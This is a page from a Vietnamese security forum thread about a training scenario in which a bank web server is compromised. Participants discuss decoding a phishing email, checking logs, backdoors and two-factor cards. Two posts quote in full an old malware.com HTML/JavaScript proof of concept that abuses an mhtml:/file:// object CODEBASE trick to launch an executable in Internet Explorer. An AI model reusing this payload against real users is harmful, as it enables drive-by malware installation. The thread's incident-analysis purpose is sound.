Trang 3 / 6 FirstFirst 123456 LastLast
Hiển thị kết quả từ 21 đến 30 / 52

Chủ đề: [DIS] Practice #1 :-)

  1. #21
    Tham gia
    20-09-2002
    Location
    Sài Gòn
    Bài viết
    2,486
    Like
    0
    Thanked 25 Times in 23 Posts
    Bài viết được gửi bởi yuna_admirer
    <title>malware.com</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">malware.com </center><object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:\malware.html!file:///malware.exe"></object>
    Cái gì đây anh Trí ?

    Admin gì mà, go to hell

  2. #22
    Tham gia
    20-09-2002
    Location
    Sài Gòn
    Bài viết
    2,486
    Like
    0
    Thanked 25 Times in 23 Posts
    Bài viết được gửi bởi yuna_admirer
    Cái gì đây anh Trí ?

    Admin gì mà, go to hell
    Tham khảo http://www.malware.com/

  3. #23
    Tham gia
    16-07-2002
    Location
    none
    Bài viết
    30
    Like
    0
    Thanked 0 Times in 0 Posts
    Chào các bạn,

    Lỗi liên quan đến windows help đã được Microsoft fix lâu rồi. Vấn đề ở đây là nằm ở máy Trọng (hoặc Hùng) ngồi hàng ngày

    PS: Microsoft vừa ra lò win2k service pack 4 (129MB) , bà con mau down về đi.

    Thân,
    Rain

  4. #24
    Tham gia
    28-09-2002
    Location
    HCM
    Bài viết
    989
    Like
    204
    Thanked 204 Times in 76 Posts
    Trước hết vì AABANK là một ngân hàng lớn mà cho nên không thể để tình trạng webserver như thế được, backup lại database ,reset lại pass ,kiểm tra backdoor trên server, manh mối quan trọng bây giờ là lá mail và logs files.

    Đây là cái phần quan trọng trong nội dung mail đã được gửi đến cho Trọng nhìn kĩ mail ta thấy được mã hoá theo dạng Base64
    ok thế thì decode ra sẽ cho ta các thông tin rất thú vị như sau

    <!-- 25.02.03 - http://www.malware.com -->

    <title>malware.com</title>
    <body bgcolor=black scroll=no>

    <SCRIPT>
    //25.02.03 - http://www.malware.com
    function malware()
    {
    s=document.URL;
    path=s.substr(-0,s.lastIndexOf("\\"));
    path=unescape(path);
    document.write( ' <title>malware.com</title>
    <body scroll=no bgcolor=black>
    <FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">malware.com </center>
    <object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\malware.html!file:///malware.exe"></object>')}
    setTimeout("malware()",150)
    </script>

    Rõ ràng là Trọng đã quá bất cẩn, đối với 1 mail như vậy.
    tìm và diệt ngay spy trên máy của trọng, sau khi WebServer đã hoạt động bình thường nên check và so sánh thật kĩ logfile trưóc đó và sau đó
    nhất định hắn sẽ quay lại xem thôi
    trước mắt có thể suy đoán hắn không thể tấn công trực tiếp vào webserver nên mới dùng send mail như vậy

    Nhưng : theo Maxx mình nên giăng bẫy lại hắn hehe
    sau khi set lại server mình lại để password y như cũ
    và check logs file xem các lần access vào server
    hehe hắn cũng là người thôi thế nào cũng để lại dấu vết

  5. #25
    Tham gia
    20-09-2002
    Location
    Sài Gòn
    Bài viết
    2,486
    Like
    0
    Thanked 25 Times in 23 Posts
    chời.

    Xem trong Log của CiscoWork2000 là thấy đứa nào gởi mail vô rồi, chi cho mất công vậy Maxx ?

  6. #26
    Tham gia
    28-09-2002
    Location
    HCM
    Bài viết
    989
    Like
    204
    Thanked 204 Times in 76 Posts
    Sory đó giờ chưa biết cái CiscoWork chòn méo ra sao ??
    hehe

  7. #27
    Tham gia
    16-07-2002
    Location
    none
    Bài viết
    30
    Like
    0
    Thanked 0 Times in 0 Posts
    tôi nghĩ nên sử dụng secure id card trước khi access vào monitor hay admin hệ thống thì an toàn hơn. Vì ngay cả máy bạn gặp vấn đề trong khi bạn giao tiếp với bên ngoài hay nội bộ , thì người ta vẫn không thể lợi dụng cái "what you know" như pass để xâm nhập hệ thống chính mà còn phải có cái "what you have" như SID card mà chắc chắn bạn giử gìn cẩn thận rồi ...
    Chào bạn,

    Bạn $$$ có thể post lên đây một vài mô hình, giải pháp v.v... về SID card cho mọi người tham khảo được không ? Tôi từ trước đến giờ chỉ dùng đến IPSec trên nền Win2k hoặc GPG chứ chưa bao giờ sờ đến 1 cái "thẻ an ninh" xem nó thế nào

    Thân,
    Rain

  8. #28
    Tham gia
    21-04-2003
    Location
    TP
    Bài viết
    10
    Like
    0
    Thanked 0 Times in 0 Posts
    ối trời , chỉ có 1 cái WS bị hack thôi mà có bnao nhiêu là vấn đề, decode mail, SID, log, ... rồi cả chuyện tình củm nữa. Vấn đề là cái ông Trí đó post bài mà có ít chi tiết quá nên làm bà con đoán già đóan non. nếu bà con là Trọng thì bà con sẽ làm gìm trình tự như thế nào ? đó mới là quan trọng . Ngồi đó đoán thì chắc tới già mất ! Cha nội Trí này chuyên chơi mấy cái trò như vầy ( phải không Trí , tui học với ông mấy năm cũng hiểu không ít thì nhiều mà) @

  9. #29
    Tham gia
    21-04-2003
    Location
    TP
    Bài viết
    10
    Like
    0
    Thanked 0 Times in 0 Posts
    PS : dù sao thì cái kiểu kể tình huống như Trí tìh cũng ... sướng thiệt. Tui cũng muốn có vài cô như bạn gái của Trọng , hê hê hê

  10. #30
    Tham gia
    12-06-2003
    Bài viết
    194
    Like
    0
    Thanked 0 Times in 0 Posts
    40 workstation thuộc private zone nên chắc chắn sẽ mang IP "ba láp". Chẵng có thằng hacker nào ngu tới mức tìm đường vô đến NOC đâu mà HACK vô WS mấy bạn ơi.

    Chiêu ... được thực hiện rất hoàn hảo, mời các bạn đã "ngâm cứu" bước 1 tiến hành "ngâm cứu" kỹ hơn bước 2 đi ...

    dô dô dô àlê alế àlê

    achxi@

    P/S: Có ai dính con sefex khi thử cái mail chưa vậy ?

Trang 3 / 6 FirstFirst 123456 LastLast

Bookmarks

Quy định

  • Bạn không thể tạo chủ đề mới
  • Bạn không thể trả lời bài viết
  • Bạn không thể gửi file đính kèm
  • Bạn không thể sửa bài viết của mình
  •